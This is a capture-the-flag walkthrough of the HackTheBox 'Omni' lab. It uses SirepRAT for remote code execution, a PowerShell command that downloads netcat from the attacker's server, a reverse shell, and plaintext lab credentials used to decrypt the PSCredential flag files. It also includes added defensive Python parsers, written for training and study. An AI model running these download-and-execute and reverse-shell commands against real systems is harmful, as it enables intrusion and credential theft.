Omni – HackTheBox Writeup
IP: 10.10.10.204
Difficulty: Easy
Summary: Omni is a Windows box that is pwned using a Windows Device Portal exploit. Post-exploitation, enumeration of files leads to the discovery of PSCredential objects, which are decoded to obtain the root flag.
Information Gathering
Performing an Nmap scan to enumerate the ports and services running on the target, we use the following command:
nmap -sC -sV -oN omni.nmap 10.10.10.204
Ports 135 and 8080 are open.
Enumeration
Port 8080 is being used by Windows Device Portal. Skimming through Microsoft's documentation for Windows Device Portal, we can infer that the target is an IoT device running Windows with Developer mode enabled.
Visiting "10.10.10.204:8080" in the browser prompts for a login.
The default credentials, "Administrator : p@ssw0rd", do not work.
Googling "Windows Device Portal exploit", the first result is the "SafeBreach-Labs/SirepRAT" git repo. This tool exploits the Sirep/WPCon protocol to get RCE.
Let's clone the tool and try it!
git clone https://github.com/SafeBreach-Labs/SirepRAT.git
cd SirepRAT
pip install -r requirements.txt
Testing the tool:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
The command returns the hostname, omni, along with some junk. We can confirm the exploit works on this box.
Exploitation
Let's get a shell by uploading netcat to the target and running it to spawn a reverse shell.
Start a Python HTTP server on port 8000 to host netcat:
python3 -m http.server
Upload netcat (nc64.exe) to a directory on the target:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell iwr -uri http://10.10.15.206:8000/nc64.exe -outfile C:\\Windows\\System32\\spool\\drivers\\color\\hnc64.exe" --v
Listen on netcat to get a shell:
nc -lvnp 1234
Run netcat on omni to get a reverse shell:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c C:\\Windows\\System32\\spool\\drivers\\color\\hnc64.exe 10.10.15.206 1234 -e powershell" --v
We get a PowerShell callback from the above command.
There was no user.txt flag at the usual location. Checking the "C:\Users\" directory, no user home directories were listed, which is unusual.
To find user.txt:
get-childitem -path C:\ -filter user.txt -recurse
The user.txt file exists in the "C:\Data\Users\app" directory. Let's look at its contents:
type "C:\Data\Users\app\user.txt"
Similarly, we can find root.txt. The contents of root.txt were also readable.
get-childitem -path C:\ -filter root.txt -recurse
type C:\Data\Users\administrator\root.txt
The contents of the files aren't in the usual flag format. The files are XML using the PowerShell serialization schema; they are probably PSCredential objects serialized with Export-CliXml.
Reading a blog on how to decode a serialized PSCredential object, we can try to decode it:
$credential = Import-CliXml -Path C:\Data\Users\app\user.txt
We get a security error. Export-CliXml protects the SecureString password with DPAPI under the key of the user who exported it, so the command must be run as that particular user to decode it. We need to dig deeper to get a shell as "app".
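To see why the flag files look the way they do and why the import fails under another account, here is an added Python example (not from the original writeup) that parses a CliXml-serialized PSCredential, extracts the user name and the <SS> secure-string blob, and checks for the DPAPI blob header that marks the value as decryptable only in the exporting user's context. The XML sample is constructed in the shape Export-CliXml produces; the password blob is a placeholder, not the real flag.

```python
import xml.etree.ElementTree as ET

# PowerShell's CliXml namespace, as written on the <Objs> root element by Export-CliXml.
PS_NS = "http://schemas.microsoft.com/powershell/2004/04"

# A DPAPI blob starts with dwVersion = 1 followed by the DPAPI provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb (fields little-endian). Export-CliXml stores
# SecureStrings via ConvertFrom-SecureString, which hex-encodes that blob when no -Key is given.
DPAPI_MAGIC = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# Constructed sample in the shape of the user.txt found on the box.
# The <SS> value is DPAPI_MAGIC plus 32 zero bytes: a placeholder, not an encrypted flag.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">{DPAPI_MAGIC}{'00' * 32}</SS>
    </Props>
  </Obj>
</Objs>
"""


def parse_pscredential_clixml(xml_text: str) -> dict:
    """Return the user name, the raw hex blob and whether it carries the DPAPI header.

    Raises ValueError when the document is not a serialized PSCredential.
    """
    root = ET.fromstring(xml_text)
    ns = {"ps": PS_NS}
    obj = root.find("ps:Obj", ns)
    if obj is None:
        raise ValueError("no serialized object found")

    # <TN> lists the type hierarchy; the first entry is the concrete type.
    type_names = [t.text for t in obj.findall("ps:TN/ps:T", ns)]
    if "System.Management.Automation.PSCredential" not in type_names:
        raise ValueError(f"not a PSCredential: {type_names}")

    username = obj.find("ps:Props/ps:S[@N='UserName']", ns)
    secure = obj.find("ps:Props/ps:SS[@N='Password']", ns)
    if username is None or secure is None or not secure.text:
        raise ValueError("PSCredential is missing UserName or Password")

    blob_hex = secure.text.strip()
    return {
        "username": username.text,
        "password_hex": blob_hex,
        # True means: only the DPAPI master key of the exporting user can unwrap it,
        # which is exactly why Import-CliXml fails for any other account.
        "dpapi_protected": blob_hex.lower().startswith(DPAPI_MAGIC),
        "blob_bytes": len(blob_hex) // 2,
    }


if __name__ == "__main__":
    info = parse_pscredential_clixml(SAMPLE_CLIXML)
    print(f"user={info['username']} dpapi={info['dpapi_protected']} size={info['blob_bytes']} bytes")
```

When triaging such a file, a DPAPI header tells you the secret is bound to a user profile (and, without roaming, to that machine), so possession of the file alone is not enough to recover it; a blob without that header was produced some other way (for example ConvertFrom-SecureString with an explicit -Key) and should be treated as a portable secret.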
Enumerating further, a hidden file called "r.bat" was found in "C:\Program Files\WindowsPowerShell\Modules\PackageManagement".
cd "C:\Program Files\WindowsPowerShell\Modules\PackageManagement"
ls -force
type r.bat
From the contents of the file, we find the credentials of app and administrator in plaintext. We can try these credentials on the login portal on port 8080.
The credentials work. After logging in, we find a "Run Command" tab under Processes, where we can run commands as the logged-in user.
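As a defensive counterpart to the plaintext credentials found in r.bat, here is an added Python example (not part of the writeup) that scans script text for hard-coded credentials, such as "net user <name> <password>" lines and "PASSWORD=" style assignments, and reports the line, the account or variable name, and a redacted secret. The sample batch text is constructed here and only reuses the account names and passwords the writeup already lists; it is not the real file's contents.

```python
import re

# Constructed sample batch script in the style of the r.bat found on the box.
# Account names and passwords are the ones the writeup lists; the layout is invented.
SAMPLE_BAT = r"""@echo off
net user app mesh5143 /add
net user administrator _1nt3rn37ofTh1nGz
net user guest * /add
set MQTT_PASSWORD=tempPass1
echo done
"""

# Each pattern captures a "key" (account or variable name) and the literal secret.
PATTERNS = [
    # net user <name> <password> [...]: a literal password argument. "*" makes net.exe
    # prompt instead and "/..." is a switch, so neither counts as a secret.
    re.compile(r"^\s*net\s+user\s+(?P<key>\S+)\s+(?P<secret>[^\s/*]\S*)", re.IGNORECASE),
    # KEY=value where KEY mentions a password (set PASSWORD=..., DB_PWD=...).
    re.compile(r"(?P<key>\w*(?:pass(?:word)?|pwd)\w*)\s*=\s*(?P<secret>\S+)", re.IGNORECASE),
]


def redact(secret: str) -> str:
    """Keep two characters so a finding is recognisable without reproducing the value."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def find_plaintext_credentials(text: str) -> list:
    """Return one finding per line that matches a hard-coded credential pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pattern in PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append({
                    "line": lineno,
                    "key": match.group("key"),
                    "secret": redact(match.group("secret")),
                })
                break  # one finding per line is enough for triage
    return findings


if __name__ == "__main__":
    for finding in find_plaintext_credentials(SAMPLE_BAT):
        print(f"line {finding['line']}: {finding['key']} -> {finding['secret']}")
```

Run against module directories, scheduled-task scripts and provisioning files, this kind of check surfaces exactly the artefact that handed over both accounts here; the redaction keeps the report itself from becoming another copy of the secret.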
Getting a reverse shell as "app":
Listen on a port:
nc -lvnp 1212
Get a reverse shell by running netcat as "app" after logging in with the credentials "app:mesh5143".
Decode the PSCredential object:
$credential = Import-CliXml -Path C:\Data\Users\app\user.txt
$credential.GetNetworkCredential().Password
Pwned user!
Similarly, for root, log in as "administrator:_1nt3rn37ofTh1nGz", get a reverse shell as administrator, and decode root.txt!
Pwned root!